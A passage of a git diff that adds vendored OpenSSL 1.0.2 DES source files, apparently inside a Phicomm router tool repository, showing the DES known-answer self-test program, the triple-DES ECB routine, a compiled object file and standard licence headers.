+static unsigned char cbc_cksum_data[8] =
+    { 0x1D, 0x26, 0x93, 0x97, 0xf7, 0xfe, 0x62, 0xb4 };
+
+static char *pt(unsigned char *p);
+static int cfb_test(int bits, unsigned char *cfb_cipher);
+static int cfb64_test(unsigned char *cfb_cipher);
+static int ede_cfb64_test(unsigned char *cfb_cipher);
+int main(int argc, char *argv[])
+{
+    int j, err = 0;
+    unsigned int i;
+    des_cblock in, out, outin, iv3, iv2;
+    des_key_schedule ks, ks2, ks3;
+    unsigned char cbc_in[40];
+    unsigned char cbc_out[40];
+    DES_LONG cs;
+    unsigned char cret[8];
+# ifdef _CRAY
+    struct {
+        int a:32;
+        int b:32;
+    } lqret[2];
+# else
+    DES_LONG lqret[4];
+# endif
+    int num;
+    char *str;
+
+# ifndef OPENSSL_NO_DESCBCM
+    printf("Doing cbcm\n");
+    if ((j = DES_set_key_checked(&cbc_key, &ks)) != 0) {
+        printf("Key error %d\n", j);
+        err = 1;
+    }
+    if ((j = DES_set_key_checked(&cbc2_key, &ks2)) != 0) {
+        printf("Key error %d\n", j);
+        err = 1;
+    }
+    if ((j = DES_set_key_checked(&cbc3_key, &ks3)) != 0) {
+        printf("Key error %d\n", j);
+        err = 1;
+    }
+    memset(cbc_out, 0, 40);
+    memset(cbc_in, 0, 40);
+    i = strlen((char *)cbc_data) + 1;
+    /* i=((i+7)/8)*8; */
+    memcpy(iv3, cbc_iv, sizeof(cbc_iv));
+    memset(iv2, '\0', sizeof iv2);
+
+    DES_ede3_cbcm_encrypt(cbc_data, cbc_out, 16L, &ks, &ks2, &ks3, &iv3, &iv2,
+                          DES_ENCRYPT);
+    DES_ede3_cbcm_encrypt(&cbc_data[16], &cbc_out[16], i - 16, &ks, &ks2,
+                          &ks3, &iv3, &iv2, DES_ENCRYPT);
+/*- if (memcmp(cbc_out,cbc3_ok,
+        (unsigned int)(strlen((char *)cbc_data)+1+7)/8*8) != 0)
+        {
+        printf("des_ede3_cbc_encrypt encrypt error\n");
+        err=1;
+        }
+*/
+    memcpy(iv3, cbc_iv, sizeof(cbc_iv));
+    memset(iv2, '\0', sizeof iv2);
+    DES_ede3_cbcm_encrypt(cbc_out, cbc_in, i, &ks, &ks2, &ks3, &iv3, &iv2,
+                          DES_DECRYPT);
+    if (memcmp(cbc_in, cbc_data, strlen((char *)cbc_data) + 1) != 0) {
+        unsigned int n;
+
+        printf("des_ede3_cbcm_encrypt decrypt error\n");
+        for (n = 0; n < i; ++n)
+            printf(" %02x", cbc_data[n]);
+        printf("\n");
+        for (n = 0; n < i; ++n)
+            printf(" %02x", cbc_in[n]);
+        printf("\n");
+        err = 1;
+    }
+# endif
+
+    printf("Doing ecb\n");
+    for (i = 0; i < NUM_TESTS; i++) {
+        DES_set_key_unchecked(&key_data[i], &ks);
+        memcpy(in, plain_data[i], 8);
+        memset(out, 0, 8);
+        memset(outin, 0, 8);
+        des_ecb_encrypt(&in, &out, ks, DES_ENCRYPT);
+        des_ecb_encrypt(&out, &outin, ks, DES_DECRYPT);
+
+        if (memcmp(out, cipher_data[i], 8) != 0) {
+            printf("Encryption error %2d\nk=%s p=%s o=%s act=%s\n",
+                   i + 1, pt(key_data[i]), pt(in), pt(cipher_data[i]),
+                   pt(out));
+            err = 1;
+        }
+        if (memcmp(in, outin, 8) != 0) {
+            printf("Decryption error %2d\nk=%s p=%s o=%s act=%s\n",
+                   i + 1, pt(key_data[i]), pt(out), pt(in), pt(outin));
+            err = 1;
+        }
+    }
+
+# ifndef LIBDES_LIT
+    printf("Doing ede ecb\n");
+    for (i = 0; i < (NUM_TESTS - 2); i++) {
+        DES_set_key_unchecked(&key_data[i], &ks);
+        DES_set_key_unchecked(&key_data[i + 1], &ks2);
+        DES_set_key_unchecked(&key_data[i + 2], &ks3);
+        memcpy(in, plain_data[i], 8);
+        memset(out, 0, 8);
+        memset(outin, 0, 8);
+        des_ecb2_encrypt(&in, &out, ks, ks2, DES_ENCRYPT);
+        des_ecb2_encrypt(&out, &outin, ks, ks2, DES_DECRYPT);
+
+        if (memcmp(out, cipher_ecb2[i], 8) != 0) {
+            printf("Encryption error %2d\nk=%s p=%s o=%s act=%s\n",
+                   i + 1, pt(key_data[i]), pt(in), pt(cipher_ecb2[i]),
+                   pt(out));
+            err = 1;
+        }
+        if (memcmp(in, outin, 8) != 0) {
+            printf("Decryption error %2d\nk=%s p=%s o=%s act=%s\n",
+                   i + 1, pt(key_data[i]), pt(out), pt(in), pt(outin));
+            err = 1;
+        }
+    }
+# endif
+
+    printf("Doing cbc\n");
+    if ((j = DES_set_key_checked(&cbc_key, &ks)) != 0) {
+        printf("Key error %d\n", j);
+        err = 1;
+    }
+    memset(cbc_out, 0, 40);
+    memset(cbc_in, 0, 40);
+    memcpy(iv3, cbc_iv, sizeof(cbc_iv));
+    des_ncbc_encrypt(cbc_data, cbc_out, strlen((char *)cbc_data) + 1, ks,
+                     &iv3, DES_ENCRYPT);
+    if (memcmp(cbc_out, cbc_ok, 32) != 0) {
+        printf("cbc_encrypt encrypt error\n");
+        err = 1;
+    }
+
+    memcpy(iv3, cbc_iv, sizeof(cbc_iv));
+    des_ncbc_encrypt(cbc_out, cbc_in, strlen((char *)cbc_data) + 1, ks,
+                     &iv3, DES_DECRYPT);
+    if (memcmp(cbc_in, cbc_data, strlen((char *)cbc_data)) != 0) {
+        printf("cbc_encrypt decrypt error\n");
+        err = 1;
+    }
+# ifndef LIBDES_LIT
+    printf("Doing desx cbc\n");
+    if ((j = DES_set_key_checked(&cbc_key, &ks)) != 0) {
+        printf("Key error %d\n", j);
+        err = 1;
+    }
+    memset(cbc_out, 0, 40);
+    memset(cbc_in, 0, 40);
+    memcpy(iv3, cbc_iv, sizeof(cbc_iv));
+    des_xcbc_encrypt(cbc_data, cbc_out, strlen((char *)cbc_data) + 1, ks,
+                     &iv3, &cbc2_key, &cbc3_key, DES_ENCRYPT);
+    if (memcmp(cbc_out, xcbc_ok, 32) != 0) {
+        printf("des_xcbc_encrypt encrypt error\n");
+        err = 1;
+    }
+    memcpy(iv3, cbc_iv, sizeof(cbc_iv));
+    des_xcbc_encrypt(cbc_out, cbc_in, strlen((char *)cbc_data) + 1, ks,
+                     &iv3, &cbc2_key, &cbc3_key, DES_DECRYPT);
+    if (memcmp(cbc_in, cbc_data, strlen((char *)cbc_data) + 1) != 0) {
+        printf("des_xcbc_encrypt decrypt error\n");
+        err = 1;
+    }
+# endif
+
+    printf("Doing ede cbc\n");
+    if ((j = DES_set_key_checked(&cbc_key, &ks)) != 0) {
+        printf("Key error %d\n", j);
+        err = 1;
+    }
+    if ((j = DES_set_key_checked(&cbc2_key, &ks2)) != 0) {
+        printf("Key error %d\n", j);
+        err = 1;
+    }
+    if ((j = DES_set_key_checked(&cbc3_key, &ks3)) != 0) {
+        printf("Key error %d\n", j);
+        err = 1;
+    }
+    memset(cbc_out, 0, 40);
+    memset(cbc_in, 0, 40);
+    i = strlen((char *)cbc_data) + 1;
+    /* i=((i+7)/8)*8; */
+    memcpy(iv3, cbc_iv, sizeof(cbc_iv));
+
+    des_ede3_cbc_encrypt(cbc_data, cbc_out, 16L, ks, ks2, ks3, &iv3,
+                         DES_ENCRYPT);
+    des_ede3_cbc_encrypt(&(cbc_data[16]), &(cbc_out[16]), i - 16, ks, ks2,
+                         ks3, &iv3, DES_ENCRYPT);
+    if (memcmp
+        (cbc_out, cbc3_ok,
+         (unsigned int)(strlen((char *)cbc_data) + 1 + 7) / 8 * 8) != 0) {
+        unsigned int n;
+
+        printf("des_ede3_cbc_encrypt encrypt error\n");
+        for (n = 0; n < i; ++n)
+            printf(" %02x", cbc_out[n]);
+        printf("\n");
+        for (n = 0; n < i; ++n)
+            printf(" %02x", cbc3_ok[n]);
+        printf("\n");
+        err = 1;
+    }
+
+    memcpy(iv3, cbc_iv, sizeof(cbc_iv));
+    des_ede3_cbc_encrypt(cbc_out, cbc_in, i, ks, ks2, ks3, &iv3, DES_DECRYPT);
+    if (memcmp(cbc_in, cbc_data, strlen((char *)cbc_data) + 1) != 0) {
+        unsigned int n;
+
+        printf("des_ede3_cbc_encrypt decrypt error\n");
+        for (n = 0; n < i; ++n)
+            printf(" %02x", cbc_data[n]);
+        printf("\n");
+        for (n = 0; n < i; ++n)
+            printf(" %02x", cbc_in[n]);
+        printf("\n");
+        err = 1;
+    }
+# ifndef LIBDES_LIT
+    printf("Doing pcbc\n");
+    if ((j = DES_set_key_checked(&cbc_key, &ks)) != 0) {
+        printf("Key error %d\n", j);
+        err = 1;
+    }
+    memset(cbc_out, 0, 40);
+    memset(cbc_in, 0, 40);
+    des_pcbc_encrypt(cbc_data, cbc_out, strlen((char *)cbc_data) + 1, ks,
+                     &cbc_iv, DES_ENCRYPT);
+    if (memcmp(cbc_out, pcbc_ok, 32) != 0) {
+        printf("pcbc_encrypt encrypt error\n");
+        err = 1;
+    }
+    des_pcbc_encrypt(cbc_out, cbc_in, strlen((char *)cbc_data) + 1, ks,
+                     &cbc_iv, DES_DECRYPT);
+    if (memcmp(cbc_in, cbc_data, strlen((char *)cbc_data) + 1) != 0) {
+        printf("pcbc_encrypt decrypt error\n");
+        err = 1;
+    }
+
+    printf("Doing ");
+    printf("cfb8 ");
+    err += cfb_test(8, cfb_cipher8);
+    printf("cfb16 ");
+    err += cfb_test(16, cfb_cipher16);
+    printf("cfb32 ");
+    err += cfb_test(32, cfb_cipher32);
+    printf("cfb48 ");
+    err += cfb_test(48, cfb_cipher48);
+    printf("cfb64 ");
+    err += cfb_test(64, cfb_cipher64);
+
+    printf("cfb64() ");
+    err += cfb64_test(cfb_cipher64);
+
+    memcpy(cfb_tmp, cfb_iv, sizeof(cfb_iv));
+    for (i = 0; i < sizeof(plain); i++)
+        des_cfb_encrypt(&(plain[i]), &(cfb_buf1[i]),
+                        8, 1, ks, &cfb_tmp, DES_ENCRYPT);
+    if (memcmp(cfb_cipher8, cfb_buf1, sizeof(plain)) != 0) {
+        printf("cfb_encrypt small encrypt error\n");
+        err = 1;
+    }
+
+    memcpy(cfb_tmp, cfb_iv, sizeof(cfb_iv));
+    for (i = 0; i < sizeof(plain); i++)
+        des_cfb_encrypt(&(cfb_buf1[i]), &(cfb_buf2[i]),
+                        8, 1, ks, &cfb_tmp, DES_DECRYPT);
+    if (memcmp(plain, cfb_buf2, sizeof(plain)) != 0) {
+        printf("cfb_encrypt small decrypt error\n");
+        err = 1;
+    }
+
+    printf("ede_cfb64() ");
+    err += ede_cfb64_test(cfb_cipher64);
+
+    printf("done\n");
+
+    printf("Doing ofb\n");
+    DES_set_key_checked(&ofb_key, &ks);
+    memcpy(ofb_tmp, ofb_iv, sizeof(ofb_iv));
+    des_ofb_encrypt(plain, ofb_buf1, 64, sizeof(plain) / 8, ks, &ofb_tmp);
+    if (memcmp(ofb_cipher, ofb_buf1, sizeof(ofb_buf1)) != 0) {
+        printf("ofb_encrypt encrypt error\n");
+        printf("%02X %02X %02X %02X %02X %02X %02X %02X\n",
+               ofb_buf1[8 + 0], ofb_buf1[8 + 1], ofb_buf1[8 + 2],
+               ofb_buf1[8 + 3], ofb_buf1[8 + 4], ofb_buf1[8 + 5],
+               ofb_buf1[8 + 6], ofb_buf1[8 + 7]);
+        printf("%02X %02X %02X %02X %02X %02X %02X %02X\n", ofb_buf1[8 + 0],
+               ofb_cipher[8 + 1], ofb_cipher[8 + 2], ofb_cipher[8 + 3],
+               ofb_buf1[8 + 4], ofb_cipher[8 + 5], ofb_cipher[8 + 6],
+               ofb_cipher[8 + 7]);
+        err = 1;
+    }
+    memcpy(ofb_tmp, ofb_iv, sizeof(ofb_iv));
+    des_ofb_encrypt(ofb_buf1, ofb_buf2, 64, sizeof(ofb_buf1) / 8, ks,
+                    &ofb_tmp);
+    if (memcmp(plain, ofb_buf2, sizeof(ofb_buf2)) != 0) {
+        printf("ofb_encrypt decrypt error\n");
+        printf("%02X %02X %02X %02X %02X %02X %02X %02X\n",
+               ofb_buf2[8 + 0], ofb_buf2[8 + 1], ofb_buf2[8 + 2],
+               ofb_buf2[8 + 3], ofb_buf2[8 + 4], ofb_buf2[8 + 5],
+               ofb_buf2[8 + 6], ofb_buf2[8 + 7]);
+        printf("%02X %02X %02X %02X %02X %02X %02X %02X\n", plain[8 + 0],
+               plain[8 + 1], plain[8 + 2], plain[8 + 3], plain[8 + 4],
+               plain[8 + 5], plain[8 + 6], plain[8 + 7]);
+        err = 1;
+    }
+
+    printf("Doing ofb64\n");
+    DES_set_key_checked(&ofb_key, &ks);
+    memcpy(ofb_tmp, ofb_iv, sizeof(ofb_iv));
+    memset(ofb_buf1, 0, sizeof(ofb_buf1));
+    memset(ofb_buf2, 0, sizeof(ofb_buf1));
+    num = 0;
+    for (i = 0; i < sizeof(plain); i++) {
+        des_ofb64_encrypt(&(plain[i]), &(ofb_buf1[i]), 1, ks, &ofb_tmp, &num);
+    }
+    if (memcmp(ofb_cipher, ofb_buf1, sizeof(ofb_buf1)) != 0) {
+        printf("ofb64_encrypt encrypt error\n");
+        err = 1;
+    }
+    memcpy(ofb_tmp, ofb_iv, sizeof(ofb_iv));
+    num = 0;
+    des_ofb64_encrypt(ofb_buf1, ofb_buf2, sizeof(ofb_buf1), ks, &ofb_tmp,
+                      &num);
+    if (memcmp(plain, ofb_buf2, sizeof(ofb_buf2)) != 0) {
+        printf("ofb64_encrypt decrypt error\n");
+        err = 1;
+    }
+
+    printf("Doing ede_ofb64\n");
+    DES_set_key_checked(&ofb_key, &ks);
+    memcpy(ofb_tmp, ofb_iv, sizeof(ofb_iv));
+    memset(ofb_buf1, 0, sizeof(ofb_buf1));
+    memset(ofb_buf2, 0, sizeof(ofb_buf1));
+    num = 0;
+    for (i = 0; i < sizeof(plain); i++) {
+        des_ede3_ofb64_encrypt(&(plain[i]), &(ofb_buf1[i]), 1, ks, ks,
+                               ks, &ofb_tmp, &num);
+    }
+    if (memcmp(ofb_cipher, ofb_buf1, sizeof(ofb_buf1)) != 0) {
+        printf("ede_ofb64_encrypt encrypt error\n");
+        err = 1;
+    }
+    memcpy(ofb_tmp, ofb_iv, sizeof(ofb_iv));
+    num = 0;
+    des_ede3_ofb64_encrypt(ofb_buf1, ofb_buf2, sizeof(ofb_buf1), ks, ks, ks,
+                           &ofb_tmp, &num);
+    if (memcmp(plain, ofb_buf2, sizeof(ofb_buf2)) != 0) {
+        printf("ede_ofb64_encrypt decrypt error\n");
+        err = 1;
+    }
+
+    printf("Doing cbc_cksum\n");
+    DES_set_key_checked(&cbc_key, &ks);
+    cs = des_cbc_cksum(cbc_data, &cret, strlen((char *)cbc_data), ks,
+                       &cbc_iv);
+    if (cs != cbc_cksum_ret) {
+        printf("bad return value (%08lX), should be %08lX\n",
+               (unsigned long)cs, (unsigned long)cbc_cksum_ret);
+        err = 1;
+    }
+    if (memcmp(cret, cbc_cksum_data, 8) != 0) {
+        printf("bad cbc_cksum block returned\n");
+        err = 1;
+    }
+
+    printf("Doing quad_cksum\n");
+    cs = des_quad_cksum(cbc_data, (des_cblock *)lqret,
+                        (long)strlen((char *)cbc_data), 2,
+                        (des_cblock *)cbc_iv);
+    if (cs != 0x70d7a63aL) {
+        printf("quad_cksum error, ret %08lx should be 70d7a63a\n",
+               (unsigned long)cs);
+        err = 1;
+    }
+#  ifdef _CRAY
+    if (lqret[0].a != 0x327eba8dL) {
+        printf("quad_cksum error, out[0] %08lx is not %08lx\n",
+               (unsigned long)lqret[0].a, 0x327eba8dUL);
+        err = 1;
+    }
+    if (lqret[0].b != 0x201a49ccL) {
+        printf("quad_cksum error, out[1] %08lx is not %08lx\n",
+               (unsigned long)lqret[0].b, 0x201a49ccUL);
+        err = 1;
+    }
+    if (lqret[1].a != 0x70d7a63aL) {
+        printf("quad_cksum error, out[2] %08lx is not %08lx\n",
+               (unsigned long)lqret[1].a, 0x70d7a63aUL);
+        err = 1;
+    }
+    if (lqret[1].b != 0x501c2c26L) {
+        printf("quad_cksum error, out[3] %08lx is not %08lx\n",
+               (unsigned long)lqret[1].b, 0x501c2c26UL);
+        err = 1;
+    }
+#  else
+    if (lqret[0] != 0x327eba8dL) {
+        printf("quad_cksum error, out[0] %08lx is not %08lx\n",
+               (unsigned long)lqret[0], 0x327eba8dUL);
+        err = 1;
+    }
+    if (lqret[1] != 0x201a49ccL) {
+        printf("quad_cksum error, out[1] %08lx is not %08lx\n",
+               (unsigned long)lqret[1], 0x201a49ccUL);
+        err = 1;
+    }
+    if (lqret[2] != 0x70d7a63aL) {
+        printf("quad_cksum error, out[2] %08lx is not %08lx\n",
+               (unsigned long)lqret[2], 0x70d7a63aUL);
+        err = 1;
+    }
+    if (lqret[3] != 0x501c2c26L) {
+        printf("quad_cksum error, out[3] %08lx is not %08lx\n",
+               (unsigned long)lqret[3], 0x501c2c26UL);
+        err = 1;
+    }
+#  endif
+# endif
+
+    printf("input word alignment test");
+    for (i = 0; i < 4; i++) {
+        printf(" %d", i);
+        des_ncbc_encrypt(&(cbc_out[i]), cbc_in,
+                         strlen((char *)cbc_data) + 1, ks,
+                         &cbc_iv, DES_ENCRYPT);
+    }
+    printf("\noutput word alignment test");
+    for (i = 0; i < 4; i++) {
+        printf(" %d", i);
+        des_ncbc_encrypt(cbc_out, &(cbc_in[i]),
+                         strlen((char *)cbc_data) + 1, ks,
+                         &cbc_iv, DES_ENCRYPT);
+    }
+    printf("\n");
+    printf("fast crypt test ");
+    str = crypt("testing", "ef");
+    if (strcmp("efGnQx2725bI2", str) != 0) {
+        printf("fast crypt error, %s should be efGnQx2725bI2\n", str);
+        err = 1;
+    }
+    str = crypt("bca76;23", "yA");
+    if (strcmp("yA1Rp/1hZXIJk", str) != 0) {
+        printf("fast crypt error, %s should be yA1Rp/1hZXIJk\n", str);
+        err = 1;
+    }
+# ifdef OPENSSL_SYS_NETWARE
+    if (err)
+        printf("ERROR: %d\n", err);
+# endif
+    printf("\n");
+    return (err);
+}
+
+static char *pt(unsigned char *p)
+{
+    static char bufs[10][20];
+    static int bnum = 0;
+    char *ret;
+    int i;
+    static char *f = "0123456789ABCDEF";
+
+    ret = &(bufs[bnum++][0]);
+    bnum %= 10;
+    for (i = 0; i < 8; i++) {
+        ret[i * 2] = f[(p[i] >> 4) & 0xf];
+        ret[i * 2 + 1] = f[p[i] & 0xf];
+    }
+    ret[16] = '\0';
+    return (ret);
+}
+
+# ifndef LIBDES_LIT
+
+static int cfb_test(int bits, unsigned char *cfb_cipher)
+{
+    des_key_schedule ks;
+    int i, err = 0;
+
+    DES_set_key_checked(&cfb_key, &ks);
+    memcpy(cfb_tmp, cfb_iv, sizeof(cfb_iv));
+    des_cfb_encrypt(plain, cfb_buf1, bits, sizeof(plain), ks, &cfb_tmp,
+                    DES_ENCRYPT);
+    if (memcmp(cfb_cipher, cfb_buf1, sizeof(plain)) != 0) {
+        err = 1;
+        printf("cfb_encrypt encrypt error\n");
+        for (i = 0; i < 24; i += 8)
+            printf("%s\n", pt(&(cfb_buf1[i])));
+    }
+    memcpy(cfb_tmp, cfb_iv, sizeof(cfb_iv));
+    des_cfb_encrypt(cfb_buf1, cfb_buf2, bits, sizeof(plain), ks, &cfb_tmp,
+                    DES_DECRYPT);
+    if (memcmp(plain, cfb_buf2, sizeof(plain)) != 0) {
+        err = 1;
+        printf("cfb_encrypt decrypt error\n");
+        for (i = 0; i < 24; i += 8)
+            printf("%s\n", pt(&(cfb_buf1[i])));
+    }
+    return (err);
+}
+
+static int cfb64_test(unsigned char *cfb_cipher)
+{
+    des_key_schedule ks;
+    int err = 0, i, n;
+
+    DES_set_key_checked(&cfb_key, &ks);
+    memcpy(cfb_tmp, cfb_iv, sizeof(cfb_iv));
+    n = 0;
+    des_cfb64_encrypt(plain, cfb_buf1, 12, ks, &cfb_tmp, &n, DES_ENCRYPT);
+    des_cfb64_encrypt(&(plain[12]), &(cfb_buf1[12]), sizeof(plain) - 12, ks,
+                      &cfb_tmp, &n, DES_ENCRYPT);
+    if (memcmp(cfb_cipher, cfb_buf1, sizeof(plain)) != 0) {
+        err = 1;
+        printf("cfb_encrypt encrypt error\n");
+        for (i = 0; i < 24; i += 8)
+            printf("%s\n", pt(&(cfb_buf1[i])));
+    }
+    memcpy(cfb_tmp, cfb_iv, sizeof(cfb_iv));
+    n = 0;
+    des_cfb64_encrypt(cfb_buf1, cfb_buf2, 17, ks, &cfb_tmp, &n, DES_DECRYPT);
+    des_cfb64_encrypt(&(cfb_buf1[17]), &(cfb_buf2[17]),
+                      sizeof(plain) - 17, ks, &cfb_tmp, &n, DES_DECRYPT);
+    if (memcmp(plain, cfb_buf2, sizeof(plain)) != 0) {
+        err = 1;
+        printf("cfb_encrypt decrypt error\n");
+        for (i = 0; i < 24; i += 8)
+            printf("%s\n", pt(&(cfb_buf2[i])));
+    }
+    return (err);
+}
+
+static int ede_cfb64_test(unsigned char *cfb_cipher)
+{
+    des_key_schedule ks;
+    int err = 0, i, n;
+
+    DES_set_key_checked(&cfb_key, &ks);
+    memcpy(cfb_tmp, cfb_iv, sizeof(cfb_iv));
+    n = 0;
+    des_ede3_cfb64_encrypt(plain, cfb_buf1, 12, ks, ks, ks, &cfb_tmp, &n,
+                           DES_ENCRYPT);
+    des_ede3_cfb64_encrypt(&(plain[12]), &(cfb_buf1[12]),
+                           sizeof(plain) - 12, ks, ks, ks,
+                           &cfb_tmp, &n, DES_ENCRYPT);
+    if (memcmp(cfb_cipher, cfb_buf1, sizeof(plain)) != 0) {
+        err = 1;
+        printf("ede_cfb_encrypt encrypt error\n");
+        for (i = 0; i < 24; i += 8)
+            printf("%s\n", pt(&(cfb_buf1[i])));
+    }
+    memcpy(cfb_tmp, cfb_iv, sizeof(cfb_iv));
+    n = 0;
+    des_ede3_cfb64_encrypt(cfb_buf1, cfb_buf2, (long)17, ks, ks, ks,
+                           &cfb_tmp, &n, DES_DECRYPT);
+    des_ede3_cfb64_encrypt(&(cfb_buf1[17]), &(cfb_buf2[17]),
+                           sizeof(plain) - 17, ks, ks, ks,
+                           &cfb_tmp, &n, DES_DECRYPT);
+    if (memcmp(plain, cfb_buf2, sizeof(plain)) != 0) {
+        err = 1;
+        printf("ede_cfb_encrypt decrypt error\n");
+        for (i = 0; i < 24; i += 8)
+            printf("%s\n", pt(&(cfb_buf2[i])));
+    }
+    return (err);
+}
+
+# endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ecb3_enc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ecb3_enc.c
new file mode 100644
index 0000000..c49fbd4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ecb3_enc.c
@@ -0,0 +1,82 @@
+/* crypto/des/ecb3_enc.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include "des_locl.h"
+
+void DES_ecb3_encrypt(const_DES_cblock *input, DES_cblock *output,
+                      DES_key_schedule *ks1, DES_key_schedule *ks2,
+                      DES_key_schedule *ks3, int enc)
+{
+    register DES_LONG l0, l1;
+    DES_LONG ll[2];
+    const unsigned char *in = &(*input)[0];
+    unsigned char *out = &(*output)[0];
+
+    c2l(in, l0);
+    c2l(in, l1);
+    ll[0] = l0;
+    ll[1] = l1;
+    if (enc)
+        DES_encrypt3(ll, ks1, ks2, ks3);
+    else
+        DES_decrypt3(ll, ks1, ks2, ks3);
+    l0 = ll[0];
+    l1 = ll[1];
+    l2c(l0, out);
+    l2c(l1, out);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ecb3_enc.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ecb3_enc.o
new file mode 100644
index 0000000000000000000000000000000000000000..f9b973d1394672acb25e9554724084e4d02ff5da
GIT binary patch
literal 1768
zcmbu8PiqrV5Wr`X)I?3=DjtNY>>)}-yCg=j7LlZFl7~iHnid4nWwY5DY4e9<1BnMc
z1P@Cteg;o|jEY_q1W)2OP|$<Yn+SDg_q}wpZZ0}7J2SsG^Zv|x`>aqdh9n7uNN^Jl
zB0&LOg%A9k<K|!%;;?t@?5_&5_n7^O+3(BtYc~8Y*Vrg>E`?dlUP;C>yKEFKJb%aR
zFU*c4t>{;(|2E?o%uF&n%tn}4V_CP%;$y?N^8GhZT3%jMQk&IY)9NYL)vTJH&s^&{
zVdm-Ow3@zh!NoLf1XV_zK`q_ggb=_kF|qxV=#xlK)<Npa(p)?mdw~Z&jf|9}N}obP
z9){KuO6Yb%&L?7of`ob%fuH+9W8uI~(q6=FCac2E?k5>VVL0?Rba-?M58iIr>B?kD
z9K#cyeL81Hb_SLD=$9;lAfB7T?@Zxf8r7_3HVxH)l|n@mVQ0{`Kr5A3m-1z8wOFha
zHnffWQn{eHX-$JNvQAJld7x=sOE<PPqrR<e>5q4C&8w&+boWP5fA70;gCGiVI=kTa
z2%-?5MHO5@p9J5LqfS5{wL557dKInJacy0A9dk!lEwgWdTGK5Z)M~d2s?lmR%qFsC
z%Q97boAb`5dHkr^Q`?<Z+w52aP@Ngfy0+EP8|HY)|8W#7rnl;UNjYRB;@;iJ%@sb`
zIaKOR4%I84sWB+bHE;wits`FGDbCMx?tl3&`MBTE9A3GE0nPcZ^%<<CIn$_K5$j*{
zLiEM@!Y+E4H}!)z@c5!mpj+tB-^$x1Fnr{mGA6Dg`X_J|9h%c$|AQwih(vDv^$(B-
z-Jil6D(;Eyk7`A|;6ZECQYn7WHE!u&I~-6?%zt-?pwAEVkOGhJ>Bi(ZdO`II9MV7U
H6@UF7`Hi6-

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ecb_enc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ecb_enc.c
new file mode 100644
index 0000000..f97fd97
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/ecb_enc.c
@@ -0,0 +1,124 @@
+/* crypto/des/ecb_enc.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
